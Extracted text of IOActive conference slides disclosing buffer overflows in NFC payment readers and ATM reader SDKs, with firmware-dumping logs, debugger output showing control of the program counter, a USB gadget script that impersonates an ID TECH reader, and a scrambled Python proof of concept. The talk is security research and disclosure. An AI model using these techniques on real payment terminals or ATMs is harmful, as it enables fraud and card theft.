CONTACTLESS

OVERFLOW
Critical contactless vulnerabilities in
NFC readers used in point of sales and
ATMs.
ABOUT ME

• Reverse engineering. From bare metal firmware to Operating

Systems…
• HW Hacker. Memory chip extractions, intraboard attacks, fault
injection…
• Code review. Firmware, Operating Systems, Server-client
Applications…
• I like to break stuff and face challenges but also to find fixes and
mitigations for my findings.

©2023 IOActive, Inc. All rights reserved.

AGENDA

• INTRODUCTION.
• IDTECH CASE.
• VULNERABLE DEVICES FROM OTHERS.
• IMPACT & WEAPONIZATION.
• ATM SCENARIO

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• Previous research:

Vulnerabilities in chip readers (not contactless)

PinPadPwn 44con (2012)
https://www.youtube.com/watch?v=wY6Zxch0dJk

Cloning EMV transactions:

Crash and Pay: Owning and Cloning Payment Devices (2015)
https://www.blackhat.com/docs/us-15/materials/us-15-Fillmore-Crash-Pay-How-To-Own-And-Clone-Contactless-Payment-
Devices.pdf

Looks like there are no previous research compromising payment readers

over NFC.

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• How they work:
NFC chip &
Antenna

Main MCU

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• How they work:

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• How they work:

http://index-of.es/Miscellanous/CONF%20SLIDES%20AND%20PAPER/us-15-Fillmore-Crash-Pay-How-To-Own-And-Clone-Contactless-Payment-Devices.pdf

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• How they work:
APDU (Application Protocol Data Unit)

https://www.openscdp.org/scripts/tutorial/emv/reademv.html

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• How they work:
APDU (Application Protocol Data Unit)

https://salmg.net/2017/09/12/intro-to-analyze-nfc-contactless-cards/

©2023 IOActive, Inc. All rights reserved.

INTRODUCTION
• What is really being sent over the air:
NFC native commands + APDU

©2023 IOActive, Inc. All rights reserved.

CARD EMULATION
• How to emulate a card and send APDUs to reader:

- Card emulation with NFC chip (ACR122U NXP PN532 Chip)

©2023 IOActive, Inc. All rights reserved.

CARD EMULATION
• How to emulate a card and send APDUs to reader:

©2023 IOActive, Inc. All rights reserved.

CARD EMULATION
• How to emulate a card and send APDUs to reader:
RFIDIOT.py

©2023 IOActive, Inc. All rights reserved.

CARD EMULATION
• How to emulate a card and send APDUs to reader:
Android app using Host Card Emulation.

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Idtech: Global leader in payment devices
https://idtechproducts.com/

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Idtech:
- Magstripe, chip & contactless readers
- Pin pads
- OEM hardware
- Touchscreen displays
- Gaming readers

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Vulnerable readers:
- Code execution vulnerabilities in firmware:
- Kiosk III
- Kiosk IV
- Vendi
- VP8300
- Most likely the vulnerability is present in all devices.

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Where to find these vulnerable devices:
- Most of Diebold/Wincor/NCR/Hyosung/Fujitsu ATMs

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Where to find these vulnerable devices:

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Where to find these vulnerable devices:

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Where to find these vulnerable devices:

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE
• Where to find these vulnerable devices:

©2023 IOActive, Inc. All rights reserved.

IDTECH CASE

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES (IDTECH)

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
Kiosk III Firmware extraction. JTAG
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
©2019 IOActive, Inc. All rights reserved. [13]
Open On-Chip Debugger
> flash banks
#0 : kx.pflash0 (kinetis) at 0x00000000, size 0x00080000, buswidth
0, chipwidth 0
#1 : kx.pflash1 (kinetis) at 0x00000000, size 0x00000000, buswidth
0, chipwidth 0
> flash read_bank 0 kiosk3_dump 0 0x00080000
wrote 524288 bytes to file kiosk3_dump from flash bank 0 at offset
0x00000000 in
7.163636s (71.472 KiB/s)
> halt
target halted due to debug-request, current mode: Thread
xPSR: 0x81000000 pc: 0x000155e8 psp: 0x1fffd850
> reg
===== arm v7m registers
(0) r0 (/32): 0x1FFFDB7C
(1) r1 (/32): 0xB6D2C2C8
(2) r2 (/32): 0x02020202
(3) r3 (/32): 0x03030303
(4) r4 (/32): 0x04040404
(5) r5 (/32): 0x05050505
(6) r6 (/32): 0x06060606
(7) r7 (/32): 0x07070707
(8) r8 (/32): 0x08080808
(9) r9 (/32): 0x09090909
(10) r10 (/32): 0x10101010
(11) r11 (/32): 0x11111111
(12) r12 (/32): 0x12121212
(13) sp (/32): 0x1FFFD850
(14) lr (/32): 0x14141414
(15) pc (/32): 0x000155E8
©2023 IOActive, Inc. All rights reserved.
VULNERABILITIES
Bare metal firmware( no OS ),
no symbols, no strings.

ARM. Aprox 1600 functions

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
• Locate where the code parses APDUs from card:

1. Locate memory address range for peripheral that receives the data.

2. Look for the bytes that the reader sends to the card:

EMV PPSE (Proxymity Payment System Environment):

2PAY.SYS.DDF01

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

If second byte == 0x82

Next two bytes specify the size

of the message (0xFFFF max)

What the hell?

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
If we are able to send an APDU bigger than 0x138h we can control $PC!

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
How we can send an Extended APDU ?

Many NFC chips that supports emulation doesn’t support extended APDU.

With the ACR122u you can only send max of 0xFF bytes

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
SOLUTION:

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
Google Pixel for the rescue:

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
Create your own Android app using Host Card Emulation:

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES (gdb) x/20i $pc
=> 0x515a6: ldmia.w sp!, {r4, r5, r6, r7, r8, r9, r10, r11, pc}
0x515aa: nop
0x515ac: stc 0, cr2, [r8], {0}
0x515b0: ; <UNDEFINED> instruction: 0xb8b4
0x515b2: movs r6, r0
0x515b4: ; <UNDEFINED> instruction: 0xf6582000
0x515b8: strh r4, [r4, #44] ; 0x2c
0x515ba: movs r0, #0
0x515bc: stmdb sp!, {r4, r5, r6, r7, r8, r9, r10, r11, lr}
(gdb) ni
0x41414140 in ?? ()
(gdb) info reg
r0 0x0 0
r1 0x3 3
r2 0x10 16
r3 0x3 3
r4 0x41414141 1094795585
r5 0x41414141 1094795585
r6 0x41414141 1094795585
r7 0x41414141 1094795585
r8 0x41414141 1094795585
r9 0x41414141 1094795585
r10 0x41414141 1094795585
r11 0x41414141 1094795585
r12 0x9f544944 -1621866172
sp 0x1fff5a38 0x1fff5a38
lr 0x39b43 236355
pc 0x41414140 0x41414140

We can send 0xFFFF (65.000) bytes of ARM instructions to modify the firmware
©2023 IOActive, Inc. All rights reserved.
VULNERABILITIES
This stack buffer overflow is present in 21 different functions (Kiosk III firmware).

Reachable in other stages of an EMV transaction:

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
Vulnerability tested in the following devices:

KioskIII bought from HappyATMs shop.

KioskIII brand new bought from IDtech.
KioskIV brand new bought from IDtech.
VP8300 brand new bought from IDtech.

©2023 IOActive, Inc. All rights reserved.

VULNERABILITIES
Vulnerability tested in the following devices:

Video of Kiosk IV crashing

Video of VP3300 crashing

©2023 IOActive, Inc. All rights reserved.

VULNERABLE VENDORS

©2023 IOActive, Inc. All rights reserved.

VULNERABLE VENDORS
• Using the same proof of concept used for IDTECH
• Most of the biggets vendors had the same vulnerability.
• Stack buffer overflow & Heap buffer overflow.
• Baremetal firmware, RTOS, Android, Linux,

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• Ingenico
Several Ingenico devices affected.

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• Ingenico
Ingenico Video

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• Verifone
Several Verifone devices affected.

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• Crane payment innovations

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• BBPOS

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• WISEASY

©2023 IOActive, Inc. All rights reserved.

VULNERABLE DEVICES
• NEXGO

©2023 IOActive, Inc. All rights reserved.

IMPACT

©2023 IOActive, Inc. All rights reserved.

IMPACT
Reader firmware completely compromised:

• Modify firmware to change price of current or future transactions.

• Modify firmware to steal future credit card info read by the reader.
• Modify firmware to attack the SDK running in the Host connected over USB.

©2023 IOActive, Inc. All rights reserved.

IMPACT
• Modify firmware to change price of current or future transactions:

©2023 IOActive, Inc. All rights reserved.

IMPACT
• Modify firmware to change price of current or future transactions:

©2023 IOActive, Inc. All rights reserved.

IMPACT
• Modify firmware to change price of current or future transactions:

The price shown in the screen will be the original

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Modify firmware to steal future credit card info read by the reader:

1. Only possible in contactless MSD (Magnetic Stripe Data) transactions.

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Modify firmware to steal future credit card info read by the reader:

1. MSD transactions Track1&Track2

Card number and expiration date

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Modify firmware to steal future credit card info read by the reader:

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• DEMO OF WEAPONIZED EXPLOIT:

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Modify firmware to attack the SDK running in the Host connected over USB:

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• IDtech’s Universal SDK (Windows & Linux):

Idtech’s SDK API in libidtechSDK.dll

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• IDtech’s Universal SDK (Windows & Linux):

Idtech’s SDK API in libidtechSDK.dll

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Device_init ( )
• Get_firmware ( )
• Start_transaction ( )
• ….

• Attacker relies on when any SDK vulnerable API is called by User’s program to
successfully attack the HOST at any given time.

Device_init( ) It is always used to start the communications. Best choice.

Attacker’s compromise the firmware of reader then:

1. Disconnect device from HOST via software

2. Reconnect, then libidtechSDK.dll device_init( ) will be called by HOST
©2023 IOActive, Inc. All rights reserved.
 IMPACT
• Device_init ( )
If it is a NEO device (specific VID&PID) then call device_setCurrentDevice( )

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Device_setcurrentdevice ( )

a2= s_device_type

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• device_SendDataCommandNeo( )

DoIDGCMD_str ( ) sends the USB payload to the readers and gets the response.

Based on the arguments received, DoIDGCMD_str( ) will not read more than 1024 bytes from the device.

Size of memcpy (a6) is 2 bytes received from device response’s message.

Source of memcpy (&v14) is the payload received from the device.

But, how big is the destination buffer (a5) ? Let’s go back to Device_setcurrentdevice ( )

©2023 IOActive, Inc. All rights reserved.

 IMPACT
• Device_setcurrentdevice ( )
&v9 is the buffer passed to device_SendDataCommandNEO( )

v9 is at ebp-52h, which means that if the device’s response is bigger

than 0x56 we can overflow the stack and overwrite the saved return address.

©2023 IOActive, Inc. All rights reserved.

IMPACT
Attack chain

©2023 IOActive, Inc. All rights reserved.

IMPACT
Attack the SDK using a raspberryPI&gadgetFS connected to the target
(Requires physical access to the USB port/cable).

©2023 IOActive, Inc. All rights reserved.

IMPACT
GadgetFS config:
#!/bin/bash
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir g && cd g
echo 0x0ACD > idVendor
echo 0x4610 > idProduct
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2
mkdir -p strings/0x409
echo "643T0423400000" > strings/0x409/serialnumber
echo "ID TECH" > strings/0x409/manufacturer
echo "ID TECH Kiosk III" > strings/0x409/product
echo 0x00 > bDeviceClass
echo 0x00 > bDeviceSubClass
echo 0x00 > bDeviceProtocol
echo 0x0040 > bMaxPacketSize0
mkdir -p configs/c.1
mkdir configs/c.1/strings/0x409
echo 0 > configs/c.1/MaxPower
mkdir -p functions/hid.usb0
echo 0 > functions/hid.usb0/protocol
echo 255 > functions/hid.usb0/report_length #
echo 0 > functions/hid.usb0/subclass
echo
"0600FF0901A10185010600FF090126FF001500953F750882020109019202018502
0901820201090192020185030901820201090192020185040901820201090192020
1C0" | xxd -r -ps > functions/hid.usb0/report_desc
echo 0xC0 > configs/c.1/bmAttributes
echo "Default Configuration" > configs/c.1/strings/0x409/configuration
ln -s functions/hid.usb0 configs/c.1
#mkdir -p functions/acm.usb0 # serial
#mkdir -p functions/rndis.usb0 # network
#ln -s functions/rndis.usb0 configs/c.1/
#ln -s functions/acm.usb0 configs/c.1/
udevadm settle -t 5 || :
ls /sys/class/udc/ > UDC
©2023 IOActive, Inc. All rights reserved.
IMPACT
POC: os.write(dev.fileno(),send)
print "HIT"
send = "\x03" + "\x41" * 63
import os,binascii os.write(dev.fileno(),send)
send = "\x03" + "\x42" * 63
dev = open("/dev/hidg0",'wb+')
while True: os.write(dev.fileno(),send)
send = "\x03" + "\x43" * 63
n = 64
data = dev.read(n) os.write(dev.fileno(),send)
rcv = binascii.hexlify(data) send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
print rcv
send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
If rcv ==
"015669564f74656368320001050000a3f90000000000000000000000000000000000 send = "\x03" + "\x44" * 63
000000000000000000000000000000000000000000000000000000000000": os.write(dev.fileno(),send)
send = "\x03" + "\x44" * 63
send = os.write(dev.fileno(),send)
send = "\x03" + "\x44" * 63
"\x02\x56\x69\x56\x4f\x74\x65\x63\x68\x32\x00\x01\x00\x03\xC0\xff\xe4\x01\x01\x9f\
x06\x07\xa0\x00\x00\x00\x04\x10\x10\xff\xe1\x01\x01\xff\xe5\x01\x10\xff\xea\x01\x0 os.write(dev.fileno(),send)
2\xff\xe3\x01\x74\xff\xe9\x0c\x02\x00\x01\x02\x20\x01\x02\x01\x01\x02\x09\x01\xff\x send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
e2\x01\x03"
send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
send = "\x03" + "\x44" * 63
os.write(dev.fileno(),send)
send = "\x04" + "\x44" * 63
os.write(dev.fileno(),send)

©2023 IOActive, Inc. All rights reserved.

IMPACT
POC:

HOST

©2023 IOActive, Inc. All rights reserved.

IMPACT
More than 20 exploitable stack buffer overflows in the SDK.

Blog posts will cover some of the other ones with POCs and Demos.

©2023 IOActive, Inc. All rights reserved.

ATM SCENARIO

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
• More than 8 years of experience jackpotting ATMs:

ATM device’s drivers reverse engineering.

ATM devices’s firmware reverse engineering.
USB communications reverse engineering.
XFS coding skills to jackpot.

Some of the most important worldwide ATM brands with contactless uses
Idtech readers:

NCR
WINCOR/DIEBOLD
FUJITSU
HYOSUNG

©2023 IOActive, Inc. All rights reserved.

ATM SCENARIO:
US ATMs uses contactless MSD to read the card (if card supports it):

Track1/Track2

©2023 IOActive, Inc. All rights reserved.

ATM SCENARIO:
ATM jackpot:

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
Compromise of the ATM computer:

• Exploiting vulnerabilities in the SDK/Driver responsible for the NFC reader comms.

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
Compromise of the ATM computer:

• Exploiting vulnerabilities in other USB Drivers/Software running in the ATM,

acting as another device (modifying the VID&PID of the firmware).

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
ATM jackpot:

ATM Computer compromised:

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
ATM jackpot:

©2023 IOActive, Inc. All rights reserved.

 ATM SCENARIO:
ATM jackpot:

©2023 IOActive, Inc. All rights reserved.

ATM SCENARIO:
No demos can be shown (NDAs involved).

Can’t specify which ATM vendor I tested (driver).

If you have concerns:

- Check if your ATM NFC reader is still vulnerable.

- Check the driver/SDK used to communicate with the NFC
reader.

©2023 IOActive, Inc. All rights reserved.

DISCLOSURE:

• We contacted all affected vendors.

• All of them said they fixed the issues.
• We tested some fixes provided to us, but not from all
vendors.
• We waited almost 2 years to give time to patch the
affected devices.

©2023 IOActive, Inc. All rights reserved.

QUESTIONS:

Thank you.

[email protected]

©2023 IOActive, Inc. All rights reserved.